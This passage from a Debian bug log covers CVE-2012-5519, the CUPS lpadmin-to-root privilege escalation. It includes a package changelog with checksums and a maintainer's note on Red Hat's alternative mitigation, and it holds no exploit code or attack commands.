     (dnssd) stopped with status 1" errors.
   * Make sure internal libraries relationships are tight enough.
   * Fix STR#4223 "lpadmin to root privilege escalation" by including the
   * upstream heavy fix.
     Fixes CVE-2012-5519, Closes: #692791.
   * Update most patches to cope with the above change.
   * Make sure to drop CVS tags from all config files.
   * Import "The scheduler did not delete job control backup files
     (STR #4244)" from upstream to fix the testsuite.
Checksums-Sha1: 
 bed5a3bfb2436a256636185f804020425edb40ba 3164 cups_1.6.1-1.dsc
 cf10a0fd7f5b02f61c087bf44c1df20b34f888e0 8218340 cups_1.6.1.orig.tar.bz2
 7a892a97b7513576094be1f71cef9cd0b249cd9b 379961 cups_1.6.1-1.debian.tar.gz
 d9630b1b2062a5e2f24da0815e5d5b9aa058a0b0 276718 libcups2_1.6.1-1_amd64.deb
 53c57418a355a4c73f076b1e0054f268aaeded82 102028 libcupsimage2_1.6.1-1_amd64.deb
 0ee144675c2179b723a98db9ea5f1a020c2527a7 115624 libcupscgi1_1.6.1-1_amd64.deb
 c404e18fe0eb9e4852d867563f1616b57540a85e 98548 libcupsmime1_1.6.1-1_amd64.deb
 b1539354fdac488e0b102b1999b478741f477d30 138222 libcupsppdc1_1.6.1-1_amd64.deb
 2f1ba9d98d5bf224a571088430ced55e5a19029e 954252 cups_1.6.1-1_amd64.deb
 2244b8398229624bdd62c6dd43673bb89ebc68c8 373018 cups-daemon_1.6.1-1_amd64.deb
 8915ffbe08fc8386705f32e1b8ff6142b160f2f8 201064 cups-client_1.6.1-1_amd64.deb
 47952d5e0b6b40982e3fede877dd17cba53f7435 346440 libcups2-dev_1.6.1-1_amd64.deb
 419f574c486be2d2f1c2aacdd0914b3be11c59d6 21882 libcupsimage2-dev_1.6.1-1_amd64.deb
 792c18a360f3a7982d9a3aea48492508fb0dbe72 121286 libcupscgi1-dev_1.6.1-1_amd64.deb
 aa4f2a5ff68726f6bd097de381052a006eb1672f 99234 libcupsmime1-dev_1.6.1-1_amd64.deb
 97e63b6410a2577ecda2ee81c48bcbe0dd7fabd4 155280 libcupsppdc1-dev_1.6.1-1_amd64.deb
 87d9ab8d8ebacdf67ea4f16f61e6f90c2b4a7e1e 30482 cups-bsd_1.6.1-1_amd64.deb
 fcbf460d10f85d8c4cc7756afc899bdd7d3c2ef3 219020 cups-common_1.6.1-1_all.deb
 98d08994657454e26210b4dd33eab2749d4b3a1f 116060 cups-ppdc_1.6.1-1_amd64.deb
 605bd7cdcf7ad7be62e92aa5c917245cca9d212a 2068788 cups-dbg_1.6.1-1_amd64.deb
Checksums-Sha256: 
 f21612cb50732952907d484a249cfb1d355898813c252da83d211515eb469220 3164 cups_1.6.1-1.dsc
 5842ab1144e653160fe667ee78b932ee036b054c0c2d20533d19e309149a7790 8218340 cups_1.6.1.orig.tar.bz2
 dd80b239d66691116c9b2dcede916a60ed5a8b2cc77ab50d41a3d2b4998f5df6 379961 cups_1.6.1-1.debian.tar.gz
 2dfc398a0fc1de8b6e4566450c17c20640c7d75e3ff66ab7faeefb85acd94113 276718 libcups2_1.6.1-1_amd64.deb
 99bde8282b888e63997b3fbbcdfc0ef7a9fdc730a94353591fcc8fc430cbb264 102028 libcupsimage2_1.6.1-1_amd64.deb
 d714709f916aec3ea3b81497619cb69a234fb8bb624886a628d4aa93dd104654 115624 libcupscgi1_1.6.1-1_amd64.deb
 0cda9e7c3493c204631ea768cc449ac7adddbb22b555e7715aad5c45f26f04db 98548 libcupsmime1_1.6.1-1_amd64.deb
 7d720f58d5cf9bbd40e0ff39c728d19c9376a2fbf48d6e69e4053456fd0b18ed 138222 libcupsppdc1_1.6.1-1_amd64.deb
 f74726e676b528539501679ba8403bbfcf86a2111a3ff96db9c6630a272eeb8e 954252 cups_1.6.1-1_amd64.deb
 d8edd65f27ed3ef9696200af2f90944c8aea149a5fe28caae9a2db6403f66f72 373018 cups-daemon_1.6.1-1_amd64.deb
 22aa0de64221baeef07ee966eb5b4024c410fb43dc813c0afdce6aa03a71bbb2 201064 cups-client_1.6.1-1_amd64.deb
 573acaadf26c848409d118159ef3858368469f83dffe2afaf299db1df6350465 346440 libcups2-dev_1.6.1-1_amd64.deb
 ea268486451b0565710065893f49575f01a2eae734674240829eb206da561fdd 21882 libcupsimage2-dev_1.6.1-1_amd64.deb
 55585c6f78dd35d6b795d1bdc90da42bbde8c19685fdd35e76994eff5f4edd3f 121286 libcupscgi1-dev_1.6.1-1_amd64.deb
 59ffcb9ba5b4584311b8cbbf12d7fb82991ed1ad67d25cc085df7c71880d27db 99234 libcupsmime1-dev_1.6.1-1_amd64.deb
 4a4a43792552b250b39a564964a88847f781e06db15f15650cd8e21a16d161bd 155280 libcupsppdc1-dev_1.6.1-1_amd64.deb
 4dc32712a5e70b97addd7ddcc7ec75d3d1d9ba72f544def42c6753b9f4ba12d3 30482 cups-bsd_1.6.1-1_amd64.deb
 5daf4afbc8b0545eb9befbbf0c1a398276a2f6e9b6abc7d5cf02f5681aa47f6a 219020 cups-common_1.6.1-1_all.deb
 5ca09ceeced0dc900797ba937455bf47aea85ea75b83a723e638cef04ae98172 116060 cups-ppdc_1.6.1-1_amd64.deb
 6abb3445a28b5480eb3c8982ba457eb9655aa93a9c29bbaa081d458c0df68ce6 2068788 cups-dbg_1.6.1-1_amd64.deb
Files: 
 1c111db80363923931d58759607028ea 3164 net optional cups_1.6.1-1.dsc
 87ade07e3d1efd03c9c3add949cf9c00 8218340 net optional cups_1.6.1.orig.tar.bz2
 588218ef7ac653cd0cc591bbc73f23c8 379961 net optional cups_1.6.1-1.debian.tar.gz
 a11dda5fd186a8e0357daf8a8c96703c 276718 libs optional libcups2_1.6.1-1_amd64.deb
 16541fa493fc7df7c079bbadbc343171 102028 libs optional libcupsimage2_1.6.1-1_amd64.deb
 4cdd07a9eb04d423a60cbd2396a8f589 115624 libs optional libcupscgi1_1.6.1-1_amd64.deb
 d53f03df70ea43696e5b283b67f558e5 98548 libs optional libcupsmime1_1.6.1-1_amd64.deb
 0a2410122274dfb5646ddec513e53734 138222 libs optional libcupsppdc1_1.6.1-1_amd64.deb
 ad03de85ef9a160667c9efc699624387 954252 net optional cups_1.6.1-1_amd64.deb
 150b2b2e9e500f638eeaa94cc6118eef 373018 net optional cups-daemon_1.6.1-1_amd64.deb
 fe0825af96e4c099b1f04d90a4a2592a 201064 net optional cups-client_1.6.1-1_amd64.deb
 f2e84a4bfc64e68ab5328948f951a173 346440 libdevel optional libcups2-dev_1.6.1-1_amd64.deb
 312a174631f60b81e43682ca90024660 21882 libdevel optional libcupsimage2-dev_1.6.1-1_amd64.deb
 cd8c3b09d7e28cf22b250c3a2ccc6ec4 121286 libdevel optional libcupscgi1-dev_1.6.1-1_amd64.deb
 1a965490b0faf3cc0b8183fca496bb09 99234 libdevel optional libcupsmime1-dev_1.6.1-1_amd64.deb
 cece77a9a155d4677659746f1ac8a8bd 155280 libdevel optional libcupsppdc1-dev_1.6.1-1_amd64.deb
 7df1fa04ed6db043a3ad346b808430c7 30482 net extra cups-bsd_1.6.1-1_amd64.deb
 d60922188a1786be8fad08294ca83c22 219020 net optional cups-common_1.6.1-1_all.deb
 223f35492106923b8f37e8da834313e5 116060 utils optional cups-ppdc_1.6.1-1_amd64.deb
 bcbc75b0470e0ac5d33b62ef5516c0a9 2068788 debug extra cups-dbg_1.6.1-1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQGcBAEBCAAGBQJQ8SpUAAoJEIvPpx7KFjRVHHoL/2HkJW/twe/plvauihDcwUuw
ScOYI6yQOkVF6/42GKAK71NIzqP0WLOngkXY5mtjbEgPT6qrs0A3IzkbkwG5jwlk
4VBJtMCm0nPtwUHe5MXIXRVe4or5y7fd+OxHharF7LhUq8t6jqUfWxkhfWJreCQ0
pAfr6RpdTBbXqByJDFWoJH0Qwy/9meODgOoalP3vT8ElP71Mio3LBNit8jsBwouf
OH+/a1mCtv9VIAZKZ7vh03vnxp7UsLl4g+VRHIXOej4mVDKSzY5pUmO5/K0+1M4z
GhTwa9+52LMvuQWbW/VwxPmYVBCst2pJsHPTXLnpGetAPa23LyjG4sBIF4X2ORam
XyRJui2GiogrcYzguizsEz/n9OLjzzHKD1YUFhZ5QnLZCh5CTL7RndfQ+p1l9+Nz
C9yXLSGL61WekzhC2ZGfzQ0srOQfQxmZvXFQNCJk/6LwUd77kXx8uyhBgEbrXvLZ
8bNpk7s0xUrpjGTBy9RSgmpVy+jzHu9yiEPvoqS17w==
=rFJy
-----END PGP SIGNATURE-----




Information forwarded to debian-bugs-dist@lists.debian.org, Debian Printing Team <debian-printing@lists.debian.org>:
Bug#692791; Package cups. (Thu, 14 Feb 2013 17:33:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian Printing Team <debian-printing@lists.debian.org>. (Thu, 14 Feb 2013 17:33:03 GMT) Full text and rfc822 format available.

Message #251 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: 692791@bugs.debian.org
Cc: team@security.debian.org
Subject: Bug#692791: #692791 - CVE-2012-5519 - cups lpadmin-to-root privilege escalation - RedHat solution
Date: Thu, 14 Feb 2013 18:28:32 +0100
Hi all,

as a matter of completeness, here's Tim Waugh's comment from the upstream 
tracker [0] on the road taken by Red Hat:

Le jeudi, 14 février 2013 15.48:38, Tim Waugh a écrit :
> FWIW, in Red Hat Enterprise Linux we'll be addressing this differently: all
> options will still be in cupsd.conf but a new option
> "ConfigurationChangeRestriction" will govern checks that are performed on
> new cupsd.conf files that are received via POST.  Default value is "all",
> meaning that all changes to security-sensitive options via POST will be
> forbidden.  Other options are "none" (prior behaviour) and "root-only"
> (only root-authenticated users may make such changes).

Now that we have released upstream's invasive fix to all our suites, I'm quite 
sure it's not worth investigating this alternative idea.

Cheers,

OdyX

[0] https://www.cups.org/str.php?L4223



Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sat, 16 Mar 2013 07:29:23 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 18 11:26:00 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.